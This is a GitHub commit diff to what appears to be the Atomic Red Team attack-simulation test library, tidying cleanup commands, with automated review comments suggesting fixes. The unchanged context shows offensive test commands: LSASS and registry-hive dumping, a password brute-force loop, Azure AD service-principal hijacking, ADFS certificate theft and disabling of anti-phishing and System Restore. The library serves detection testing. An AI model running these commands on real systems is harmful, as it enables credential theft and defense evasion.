Cleaning up the Cleanup commands (#1685)

* cleanup fixes

* cleanup fixes

* cleanup fixes
Carrie Roberts
2021-12-09 11:42:14 -07:00
committed by GitHub
parent 17d151ba0c
commit 5bb5878e62
26 changed files with 57 additions and 64 deletions
+2 -2
@@ -369,7 +369,7 @@ atomic_tests:
$ID = $FIELDS[1]
& "#{createdump_exe}" -u -f #{output_file} $ID
cleanup_command: |
del #{output_file}
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
- name: Dump LSASS.exe using imported Microsoft DLLs
@@ -403,6 +403,6 @@ atomic_tests:
command: |
#{xordump_exe} -out #{output_file} -x 0x41
cleanup_command: |
Remove-Item ${output_file} -ErrorAction Ignore
Remove-Item #{output_file} -ErrorAction Ignore
name: powershell
elevation_required: true
+2 -4
@@ -130,9 +130,8 @@ atomic_tests:
name: powershell
elevation_required: false
cleanup_command: |
write-host ""
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove
rm $toremove -ErrorAction Ignore
- name: dump volume shadow copy hives with System.IO.File
auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0
@@ -165,6 +164,5 @@ atomic_tests:
name: powershell
elevation_required: false
cleanup_command: |
write-host ""
$toremove = #{dump_path} + "\" + '#{dumped_hive}'
rm $toremove
rm $toremove -ErrorAction Ignore
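Review bot: `rm $toremove -ErrorAction Ignore` now tolerates a missing file, but the path it receives is still built by `$toremove = #{dump_path} + "\" + '#{dumped_hive}'`, where `#{dump_path}` is substituted unquoted; unless that argument's default (outside the hunk) is itself a quoted PowerShell expression, a bare path there is parsed in command mode rather than as a string and the cleanup never reaches `rm`. Quoting the substitution, `$toremove = "#{dump_path}" + "\" + '#{dumped_hive}'`, or building it with `Join-Path "#{dump_path}" '#{dumped_hive}'`, makes the cleanup independent of how the argument is supplied. The same construction appears in the second hunk of this file.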
+4 -4
@@ -116,10 +116,10 @@ atomic_tests:
executor:
command: netsh trace start capture=yes tracefile=%temp%\trace.etl maxsize=10
cleanup_command: |-
netsh trace stop
TIMEOUT /T 50
del %temp%\trace.etl
del %temp%\trace.cab
netsh trace stop >nul 2>&1
TIMEOUT /T 5 >nul 2>&1
del %temp%\trace.etl >nul 2>&1
del %temp%\trace.cab >nul 2>&1
name: command_prompt
elevation_required: true
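Review bot: `TIMEOUT /T 5 >nul 2>&1` only delays when stdin is a console; with stdin redirected, as is common when a harness runs the cleanup, TIMEOUT exits at once with an input-redirection error that the new redirection now hides, so the two `del` lines may run before `netsh trace stop` has finished writing the .cab. If a pause is actually needed, a wait that does not read the console, e.g. `ping -n 6 127.0.0.1 >nul`, behaves the same interactively and non-interactively; if `netsh trace stop` completes synchronously on the targeted versions the line can be dropped instead. Hiding stderr on `netsh trace stop` also loses the only indication that the trace is still running when the deletes then fail on a locked .etl.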
+1 -1
@@ -148,7 +148,7 @@ atomic_tests:
Invoke-WmiMethod -Path #{new_class} -Name create -ArgumentList #{process_to_execute}
cleanup_command: |
$CleanupClass = New-Object Management.ManagementClass(New-Object Management.ManagementPath("#{new_class}"))
$CleanupClass.Delete()
try { $CleanupClass.Delete() } catch {}
- name: WMI Execute rundll32
auto_generated_guid: 00738d2a-4651-4d76-adf2-c43a41dfb243
description: |
+1 -1
@@ -50,7 +50,7 @@ atomic_tests:
command: |
echo "#{message}" > "#{file_contents_path}" & type "#{file_contents_path}"
cleanup_command: |
del "#{file_contents_path}"
del "#{file_contents_path}" >nul 2>&1
name: command_prompt
- name: Suspicious Execution via Windows Command Shell
auto_generated_guid: d0eb3597-a1b3-4d65-b33b-2cda8d397f20
+1 -1
@@ -76,7 +76,7 @@ atomic_tests:
New-Item -Path "#{output_path}" -ItemType Directory > $null
& "#{sharphound_path}" -d "#{domain}" --CollectionMethod LocalAdmin --NoSaveCache --OutputDirectory "#{output_path}"
cleanup_command: |
Remove-Item -Recurse #{output_path}
Remove-Item -Recurse #{output_path} -ErrorAction Ignore
- name: Wmic Group Discovery
auto_generated_guid: 7413be50-be8e-430f-ad4d-07bf197884b2
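Review bot: `Remove-Item -Recurse #{output_path} -ErrorAction Ignore` leaves the path unquoted and omits `-Force`, while the executor two lines above quotes the same argument (`"#{output_path}"`); a value containing a space is split into several paths, and read-only or hidden output files make the recursive delete fail silently under `-ErrorAction Ignore`. `Remove-Item -Recurse -Force "#{output_path}" -ErrorAction Ignore` matches the executor's quoting and removes the directory regardless of file attributes.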
+8 -4
@@ -66,10 +66,11 @@ atomic_tests:
Write-Host "End of Hijacking"
cleanup_command: |
Import-Module -Name AzureAD
try {
Import-Module -Name AzureAD -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential
Connect-AzureAD -Credential $Credential -ErrorAction Ignore
$sp = Get-AzureADServicePrincipal -Searchstring "#{service_principal_name}"
$credz = Get-AzureADServicePrincipalKeyCredential -ObjectId $sp.ObjectId
@@ -80,6 +81,7 @@ atomic_tests:
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{service_principal_name}.pfx"
} catch {}
name: powershell
elevation_required: false
@@ -146,10 +148,11 @@ atomic_tests:
Write-Host "Application Hijacking worked. Logged in successfully as $($auth.Account.Id) of type $($auth.Account.Type)"
Write-Host "End of Hijacking"
cleanup_command: |
Import-Module -Name AzureAD
try {
Import-Module -Name AzureAD -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
Connect-AzureAD -Credential $Credential
Connect-AzureAD -Credential $Credential -ErrorAction Ignore
$app = Get-AzureADApplication -Searchstring "#{application_name}"
$credz = Get-AzureADApplicationKeyCredential -ObjectId $app.ObjectId
@@ -160,6 +163,7 @@ atomic_tests:
}
Get-ChildItem -Path Cert:\CurrentUser\My | where { $_.FriendlyName -eq "AtomicCert" } | Remove-Item
rm "#{path_to_cert}\#{application_name}.pfx"
} catch {}
name: powershell
elevation_required: false
- name: AWS - Create Access Key and Secret Key
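Review bot: Inside the new try block the `rm "#{path_to_cert}\#{service_principal_name}.pfx"` line (and `rm "#{path_to_cert}\#{application_name}.pfx"` in the second cleanup of this file) still emits a non-terminating error when the file is already gone, because try/catch only intercepts terminating errors and Remove-Item's missing-path error is not one. Appending `-ErrorAction Ignore` to both `rm` lines, as the commit already does for Import-Module and Connect-AzureAD, keeps the cleanup quiet on re-runs. With `-ErrorAction Ignore` on Connect-AzureAD a failed sign-in no longer stops the block; the later Get-AzureAD* calls then throw into the empty catch, which hides why the credential or certificate was not removed — `catch { Write-Warning $_ }` would preserve that signal without changing the exit behaviour.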
+1 -1
@@ -438,7 +438,7 @@ atomic_tests:
cleanup_command: |
$inetcache = $env:LOCALAPPDATA + "\Microsoft\Windows\INetCache\"
$file_to_be_removed = [string[]] (Get-ChildItem -Path $inetcache -Include #{file_name}* -Recurse -Force -File -ErrorAction SilentlyContinue)
cmd.exe /c "del $file_to_be_removed"
if("" -ne "$file_to_be_removed") { Remove-Item "$file_to_be_removed" -ErrorAction Ignore }
name: powershell
- name: Curl Download File
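Review bot: `Remove-Item "$file_to_be_removed" -ErrorAction Ignore` stringifies a `[string[]]`, so when Get-ChildItem matches more than one file the paths are joined with spaces into a single non-existent path and nothing is removed, and a single path containing a space is likewise broken. Remove-Item accepts an array directly, so `if ($file_to_be_removed) { Remove-Item -LiteralPath $file_to_be_removed -Force -ErrorAction Ignore }` handles both cases; `-Force` is needed because the enumeration uses `-Force` and may return hidden files.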
+2 -2
@@ -33,8 +33,8 @@ atomic_tests:
echo "Password!" >> #{input_file_passwords}
@FOR /F %n in (#{input_file_users}) DO @FOR /F %p in (#{input_file_passwords}) DO @net use #{remote_host} /user:#{domain}\%n %p 1>NUL 2>&1 && @echo [*] %n:%p && @net use /delete #{remote_host} > NUL
cleanup_command: |-
del #{input_file_users}
del #{input_file_passwords}
del #{input_file_users} >nul 2>&1
del #{input_file_passwords} >nul 2>&1
- name: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)
auto_generated_guid: c2969434-672b-4ec8-8df0-bbb91f40e250
description: |
+1 -1
@@ -106,5 +106,5 @@ atomic_tests:
command: |
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope LocalMachine
cleanup_command: |
Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine
try { Set-ExecutionPolicy -ExecutionPolicy #{default_execution_policy} -Scope LocalMachine -Force } catch {}
name: powershell
+1 -1
@@ -14,7 +14,7 @@ atomic_tests:
dir c: /b /s .docx | findstr /e .docx
for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection
cleanup_command: |
del %temp%\T1119_command_prompt_collection /F /Q >null 2>&1
del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1
name: command_prompt
- name: Automated Collection PowerShell
auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313
+2 -5
@@ -2,7 +2,7 @@ attack_technique: T1134.002
display_name: "Create Process with Token"
atomic_tests:
- name: Access Token Manipulation
auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
auto_generated_guid: dbf4f5a9-b8e0-46a3-9841-9ad71247239e
description: |
This Action demonstrates how an access token for a specific program can spawn another program under a different owner.
Adversaries can leverage access tokens to run programs under a different user not only to achieve privilege escalation but also to evade detection by blending in with normal user activity.
@@ -15,9 +15,6 @@ atomic_tests:
$owners = @{}
gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
Set-Location $PathToAtomicsFolder
.\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
cleanup_command: |
taskkill /im cmd.exe /f
$PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
name: powershell
elevation_required: true
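Review bot: The cleanup_command for this test is removed together with `taskkill /im cmd.exe /f`, so the cmd.exe that `[MyProcess]::CreateProcessFromParent` spawns is left running after the test, which is the opposite of what the commit sets out to do. Dropping the old line is reasonable since it killed every cmd.exe on the host, but a replacement that stops only the process the test created (for example by recording the returned PID and calling `Stop-Process -Id` on it) would keep the test self-contained; the enclosing executor block starts before the hunk. Whether `$PathToAtomicsFolder\T1134.002\src\GetToken.ps1` is runnable as written depends on the harness substituting that placeholder before execution, since PowerShell itself does not accept a variable followed by a path as a command without `&`.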
+1 -1
@@ -17,5 +17,5 @@ atomic_tests:
command: |
reg add "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d "#{thing_to_execute}"
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf"
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office test\Special\Perf" /f >nul 2>&1
name: command_prompt
+1 -1
@@ -36,4 +36,4 @@ atomic_tests:
command: |
reg.exe add HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /t REG_SZ /d #{url} /f
cleanup_command: |
reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f
reg.exe delete HKCU\Software\Microsoft\Office\#{outlook_version}\Outlook\WebView\#{outlook_folder} /v URL /f >nul 2>&1
+2 -2
@@ -17,6 +17,6 @@ atomic_tests:
mkdir %APPDATA%\Microsoft\Outlook\ >nul 2>&1
echo "Atomic Red Team TEST" > %APPDATA%\Microsoft\Outlook\VbaProject.OTM
cleanup_command: |
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Security\Level" /f >nul 2>&1
del %APPDATA%\Microsoft\Outlook\VbaProject.OTM >nul 2>&1
name: command_prompt
+1 -1
@@ -114,5 +114,5 @@ atomic_tests:
command: |
set "#{download_path}" && cmd /c desktopimgdownldr.exe /lockscreenurl:#{remote_file} /eventName:desktopimgdownldr
cleanup_command: |
del #{cleanup_path}\#{cleanup_file} >null 2>&1
del #{cleanup_path}\#{cleanup_file} >nul 2>&1
name: command_prompt
+1 -1
@@ -315,7 +315,7 @@ atomic_tests:
Invoke-WebRequest #{pua_url} -OutFile #{pua_file}
& "#{pua_file}"
cleanup_command: |
Remove-Item #{pua_file}
Remove-Item #{pua_file} -ErrorAction Ignore
- name: Office Generic Payload Download
auto_generated_guid: 5202ee05-c420-4148-bf5e-fd7f7d24850c
description: |
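Review bot: `Remove-Item #{pua_file} -ErrorAction Ignore` leaves the path unquoted although the executor two lines above quotes it (`& "#{pua_file}"`), so a value with a space expands into several arguments. `Remove-Item "#{pua_file}" -Force -ErrorAction Ignore` matches the executor; if the downloaded executable is still running when the cleanup executes, the delete is refused and `-ErrorAction Ignore` hides that, so stopping the launched process first would make the cleanup reliable.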
+1 -1
@@ -82,7 +82,7 @@ atomic_tests:
$installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
Invoke-WebRequest -OutFile $installer "https://d1kuyuqowve5id.cloudfront.net/ScreenConnect_21.11.4237.7885_Release.msi"
msiexec /i $installer /qn
cleanup_command:
cleanup_command: |
$installer = "C:\Users\$env:username\Downloads\ScreenConnect.msi"
msiexec /x $installer /qn
name: powershell
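Review bot: `msiexec /x $installer /qn` returns immediately because msiexec is a GUI-subsystem executable, so the cleanup reports success before the uninstall has actually run, and the downloaded .msi that the line above re-derives is never deleted from Downloads. Running it synchronously and deleting the file afterwards, `Start-Process msiexec.exe -ArgumentList "/x `"$installer`" /qn" -Wait` followed by `Remove-Item $installer -ErrorAction Ignore`, closes both gaps. The same asynchronous return applies to `msiexec /i $installer /qn` in the executor above the hunk.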
+2 -2
@@ -49,7 +49,7 @@ atomic_tests:
command: |
#{msxsl_exe} #{xmlfile} #{xslfile}
cleanup_command: |
Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
del #{msxsl_exe} >nul 2>&1
name: command_prompt
- name: MSXSL Bypass using remote files
auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985
@@ -85,7 +85,7 @@ atomic_tests:
command: |
#{msxsl_exe} #{xmlfile} #{xslfile}
cleanup_command: |
Remove-Item -Path #{msxsl_exe} -Force -ErrorAction Ignore
del -Path #{msxsl_exe} >nul 2>&1
name: command_prompt
- name: WMIC bypass using local XSL file
auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988
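Review bot: `del -Path #{msxsl_exe} >nul 2>&1` in the second hunk is a cmd.exe command but keeps the PowerShell-style `-Path` switch; cmd's `del` treats `-Path` as an additional file name, so the line works only because the error for the nonexistent `-Path` file is swallowed by the redirection. Use `del #{msxsl_exe} >nul 2>&1` as in the first hunk. Both cleanups also leave the path unquoted, as does the executor line; quoting `"#{msxsl_exe}"` in all three would tolerate a directory with spaces.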
+5 -15
@@ -95,28 +95,18 @@ atomic_tests:
- windows
input_arguments:
file_or_folder:
description: Path of the file or folder remove attribute.
description: Path of the files to hide.
type: Path
default: '%temp%\T1222.001_attrib_2'
dependency_executor_name: command_prompt
dependencies:
- description: |
Test requires a file to modify to be located at (#{file_or_folder})
prereq_command: |
IF EXIST #{file_or_folder} ( EXIT 0 ) ELSE ( EXIT 1 )
get_prereq_command: |
mkdir #{file_or_folder}
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
executor:
command: |
mkdir #{file_or_folder} >nul 2>&1
echo T1222.001_attrib1 >> #{file_or_folder}\T1222.001_attrib1.txt
echo T1222.001_attrib2 >> #{file_or_folder}\T1222.001_attrib2.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib1.txt
attrib.exe +h #{file_or_folder}\T1222.001_attrib2.txt
cleanup_command: |
attrib.exe -h #{file_or_folder}\T1222.001_attrib1.txt
attrib.exe -h #{file_or_folder}\T1222.001_attrib2.txt
del #{file_or_folder}\T1222.001_attrib*.txt
rmdir #{file_or_folder}
del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1
name: command_prompt
- name: 'Grant Full Access to folder for Everyone - Ryuk Ransomware Style'
auto_generated_guid: ac7e6118-473d-41ec-9ac0-ef4f1d1ed2f6
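Review bot: The new cleanup `del /A:H #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1` no longer removes the directory that the executor now creates with `mkdir #{file_or_folder}`, and `/A:H` only matches files that still carry the hidden attribute, so a run in which `attrib.exe +h` failed leaves both the files and the folder behind. `del /A #{file_or_folder}\T1222.001_attrib*.txt >nul 2>&1` (no attribute filter deletes regardless of attributes) followed by `rmdir #{file_or_folder} >nul 2>&1` restores the end state the old cleanup produced.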
+4 -2
@@ -64,11 +64,13 @@ atomic_tests:
Get-AzureADExternalDomainFederation -ExternalDomainName "#{domain_name}"
Write-Host "End of federation configuration."
cleanup_command: |
Import-Module AzureADPreview
try {
Import-Module AzureADPreview -ErrorAction Ignore
$PWord = ConvertTo-SecureString -String "#{azure_password}" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{azure_username}", $Pword
Connect-AzureAD -Credential $Credential > $null
Connect-AzureAD -Credential $Credential -ErrorAction Ignore
Remove-AzureADExternalFederationDomain -ExternalDomainName "#{domain_name}"
} catch {}
name: powershell
+2 -2
@@ -112,6 +112,6 @@ atomic_tests:
command: |
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable
cleanup_command: |
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable
name: powershell
schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1
name: command_prompt
elevation_required: true
+1 -1
@@ -15,6 +15,6 @@ atomic_tests:
command: |
reg add "hklm\system\currentcontrolset\control\print\monitors\ART" /v "Atomic Red Team" /d "#{monitor_dll}" /t REG_SZ
cleanup_command: |
reg delete "hklm\system\currentcontrolset\control\print\monitors\ART"
reg delete "hklm\system\currentcontrolset\control\print\monitors\ART" /f >nul 2>&1
name: command_prompt
elevation_required: true
+4 -4
@@ -125,8 +125,8 @@ atomic_tests:
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
Write-Host "`nCertificates retrieved successfully"
cleanup_command: |
Remove-Item -Path ".\ADFS_encryption.pfx"
Remove-Item -Path ".\ADFS_signing.pfx"
Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
name: powershell
- name: ADFS token signing and encryption certificates theft - Remote
auto_generated_guid: cab413d8-9e4a-4b8d-9b84-c985bd73a442
@@ -194,6 +194,6 @@ atomic_tests:
Get-ChildItem | Where-Object {$_ -like "ADFS*"}
Write-Host "`nCertificates retrieved successfully"
cleanup_command: |
Remove-Item -Path ".\ADFS_encryption.pfx"
Remove-Item -Path ".\ADFS_signing.pfx"
Remove-Item -Path ".\ADFS_encryption.pfx" -ErrorAction Ignore
Remove-Item -Path ".\ADFS_signing.pfx" -ErrorAction Ignore
name: powershell
+3 -3
@@ -117,9 +117,7 @@ atomic_tests:
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
}
catch {
Write-Host "Elevation required but not provided" -ForegroundColor Red
}
catch { }
name: powershell
elevation_required: true
- name: Install root CA on Windows with certutil
@@ -147,8 +145,10 @@ atomic_tests:
command: |
certutil -addstore my #{pfx_path}
cleanup_command: |
try {
$cert = Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My
Get-ChildItem Cert:\LocalMachine\My\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
Get-ChildItem Cert:\LocalMachine\Root\$($cert.Thumbprint) -ErrorAction Ignore | Remove-Item -ErrorAction Ignore
} catch { }
name: powershell
elevation_required: true
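Review bot: The second hunk's cleanup re-imports the certificate with `Import-Certificate -FilePath #{pfx_path} -CertStoreLocation Cert:\LocalMachine\My` just to learn its thumbprint, which adds the cert back to the machine store during cleanup and, if the following Remove-Item fails, leaves it installed. Reading the thumbprint from the file without touching the store, `$cert = New-Object System.Security.Cryptography.X509Certificates.X509Certificate2 "#{pfx_path}"`, avoids that side effect; this assumes the .pfx has no password, which is consistent with the password-less `certutil -addstore` line above. In the first hunk, replacing the catch body with `catch { }` drops the only message that told the user the cleanup needs elevation; `catch { Write-Warning "Certificate cleanup failed: $_" }` keeps the cleanup quiet on success but still reports why a cert was left behind.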
+3 -1
@@ -519,12 +519,14 @@ atomic_tests:
Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
cleanup_command: |
$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
if("#{password}" -ne "") {
$secure_pwd = ("#{password}" + "") | ConvertTo-SecureString -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
Connect-ExchangeOnline -Credential $creds
$test = Get-AntiPhishRule
Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
Get-AntiPhishRule
}
name: powershell
elevation_required: false
- name: Disable Windows Defender with DISM
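Review bot: `("#{password}" + "")` on the new line is a no-op, since `"#{password}"` is already a string, so the added concatenation only obscures the line; `$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force` inside the new `if` reads the same. The guard skips the whole cleanup when the password is empty but says nothing about the anti-phish rule it leaves disabled, and the session opened by `Connect-ExchangeOnline` is never closed; an `else { Write-Warning "password not supplied, anti-phish rule left disabled" }` and a trailing `Disconnect-ExchangeOnline -Confirm:$false` after `Get-AntiPhishRule` would round the block out. The enclosing test starts before the hunk.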